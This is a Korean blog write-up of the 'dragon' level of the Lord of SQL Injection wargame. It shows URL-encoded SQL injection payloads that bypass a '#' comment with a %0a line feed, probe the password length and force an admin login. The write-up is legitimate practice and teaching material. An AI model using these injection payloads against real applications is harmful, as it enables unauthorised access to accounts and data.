cgy12306
[LOS] dragon 본문
pw에 아무 값이나 넣어보자.
https://los.eagle-jump.org/dragon_7ead3fe768221c5d34bc42d518130972.php?pw=123
pw가 아무런 값이나 들어가 있어도 #으로 인해 뒤에 모든 문자가 주석처리 돼서 Hello guest가 출력이 된다.
우선 주석을 우회해야 한다. #은 한 줄만 주석처리를 하기 때문에 Line Feed(\n)인 %0a로 한 줄을 넘기고 그 다음에 값을 입력하면 된다.
https://los.eagle-jump.org/dragon_7ead3fe768221c5d34bc42d518130972.php?pw=%27%20%0aand%20length(pw)%3C%2720
pw의 길이가 20글자 미만인 경우에는 아무런 값이 안뜨는 것을 보면 정상적으로 주석을 우회했다는 것을 알 수 있다.
https://los.eagle-jump.org/dragon_7ead3fe768221c5d34bc42d518130972.php?pw=%27%20%0aand%20length(pw)=%2720
pw의 길이가 20글자 일때 참이 되어서 Hello guest를 출력할 수 있다.
https://los.eagle-jump.org/dragon_7ead3fe768221c5d34bc42d518130972.php?pw=' or id='admin' and length(pw)>'0
or id='admin' and length(pw)>'0을 입력하게 되면 Hello admin이 뜰 줄 알았는데 안떠서 계속 헤맸다.
알고보니 앞에 id='guest'라는 값은 이미 참이어서 guest를 출력하게 되는 것이다. 그럼 강제로 pw를 틀린 값을 입력해주면 admin이 나올 것이다.
https://los.eagle-jump.org/dragon_7ead3fe768221c5d34bc42d518130972.php?pw=%27%20%0a and pw='' or%20id=%27admin%27%20and%20length(pw)>%270
다 풀어보고 나니 pw길이를 알아낼 필요는 없었던 문제였다.
'Wargame > LOS' 카테고리의 다른 글
[LOS] dark_eyes (0) | 2019.09.08 |
---|---|
[LOS] iron_golem (0) | 2019.09.07 |
[LOS] xavis (0) | 2019.09.07 |
[LOS] nightmare (0) | 2019.08.30 |
[LOS] succubus (0) | 2019.08.30 |
Comments